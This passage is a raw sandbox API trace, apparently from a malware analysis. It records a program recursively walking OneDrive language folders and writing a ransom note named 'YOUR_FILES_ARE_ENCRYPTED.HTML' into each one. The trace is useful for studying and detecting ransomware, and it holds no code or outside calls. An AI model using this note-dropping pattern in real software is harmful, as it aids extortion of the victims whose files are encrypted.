lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ky", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ky\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ky\\*" [0112.098] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ky\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b37172b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b37172b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b587918, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0112.098] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b37172b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b37172b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b587918, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="..", cAlternateFileName="")) returned 1 [0112.098] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b587918, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b587918, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6464e2, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.098] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.098] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ky\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.098] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.098] lstrlenW (lpString=".mui") returned 4 [0112.098] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.098] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b587918, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b587918, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6464e2, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.098] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0112.099] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ky\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.099] GetProcessHeap () returned 0x600000 [0112.099] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ky\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ky\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.099] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.100] CloseHandle (hObject=0x330) returned 1 [0112.100] GetProcessHeap () returned 0x600000 [0112.100] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.100] GetProcessHeap () returned 0x600000 [0112.101] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.101] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6464e2, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6464e2, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6464e2, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="lb-lu", cAlternateFileName="")) returned 1 [0112.101] StrStrIW (lpFirst="lb-lu", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.101] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lb-lu") returned 81 [0112.101] GetProcessHeap () returned 0x600000 [0112.101] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0112.101] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lb-lu" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lb-lu") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lb-lu" [0112.101] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lb-lu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lb-lu\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lb-lu\\*" [0112.101] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lb-lu\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6464e2, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6464e2, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b91b09f, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName=".", cAlternateFileName="")) returned 0x626838 [0112.101] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6464e2, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6464e2, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b91b09f, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="..", cAlternateFileName="")) returned 1 [0112.101] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b91b09f, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b91b09f, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1bf10fb1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.101] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.101] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lb-lu\\FileSync.LocalizedResources.dll.mui") returned 117 [0112.102] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.102] lstrlenW (lpString=".mui") returned 4 [0112.102] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.102] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b91b09f, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b91b09f, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1bf10fb1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.102] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0112.102] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lb-lu\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0112.102] GetProcessHeap () returned 0x600000 [0112.102] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lb-lu\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\lb-lu\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.102] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.103] CloseHandle (hObject=0x330) returned 1 [0112.103] GetProcessHeap () returned 0x600000 [0112.103] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.103] GetProcessHeap () returned 0x600000 [0112.103] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.103] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4ba8d9, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1c4ba8d9, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1c4ba8d9, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="lt", cAlternateFileName="")) returned 1 [0112.103] StrStrIW (lpFirst="lt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.103] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lt") returned 78 [0112.104] GetProcessHeap () returned 0x600000 [0112.104] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0112.104] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lt" [0112.104] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lt\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lt\\*" [0112.104] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lt\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4ba8d9, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1c4ba8d9, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1c5eb9fa, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0112.104] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4ba8d9, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1c4ba8d9, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1c5eb9fa, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="..", cAlternateFileName="")) returned 1 [0112.104] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c5eb9fa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1c5eb9fa, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1df1a8aa, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.104] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.104] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lt\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.104] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.104] lstrlenW (lpString=".mui") returned 4 [0112.104] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.104] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c5eb9fa, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1c5eb9fa, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1df1a8aa, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.104] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0112.104] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.104] GetProcessHeap () returned 0x600000 [0112.104] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\lt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.105] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.106] CloseHandle (hObject=0x330) returned 1 [0112.106] GetProcessHeap () returned 0x600000 [0112.106] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.106] GetProcessHeap () returned 0x600000 [0112.106] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.107] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x246849d3, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x246849d3, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x246849d3, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="lv", cAlternateFileName="")) returned 1 [0112.107] StrStrIW (lpFirst="lv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.107] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lv") returned 78 [0112.107] GetProcessHeap () returned 0x600000 [0112.107] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0112.233] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lv" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lv") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lv" [0112.233] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lv", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lv\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lv\\*" [0112.233] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lv\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x246849d3, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x246849d3, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x29b4e321, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName=".", cAlternateFileName="")) returned 0x626878 [0112.233] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x246849d3, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x246849d3, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x29b4e321, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="..", cAlternateFileName="")) returned 1 [0112.233] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29b4e321, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x29b4e321, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x2b646bb1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.233] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.233] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lv\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.233] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.233] lstrlenW (lpString=".mui") returned 4 [0112.233] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.233] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29b4e321, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x29b4e321, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x2b646bb1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.233] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0112.234] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lv\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.234] GetProcessHeap () returned 0x600000 [0112.234] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\lv\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\lv\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0112.235] WriteFile (in: hFile=0x328, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.236] CloseHandle (hObject=0x328) returned 1 [0112.236] GetProcessHeap () returned 0x600000 [0112.236] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.236] GetProcessHeap () returned 0x600000 [0112.236] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.237] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x246849d3, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x246849d3, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x246849d3, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="lv", cAlternateFileName="")) returned 0 [0112.238] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0112.238] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0112.238] GetProcessHeap () returned 0x600000 [0112.238] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0112.238] WriteFile (in: hFile=0x31c, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, 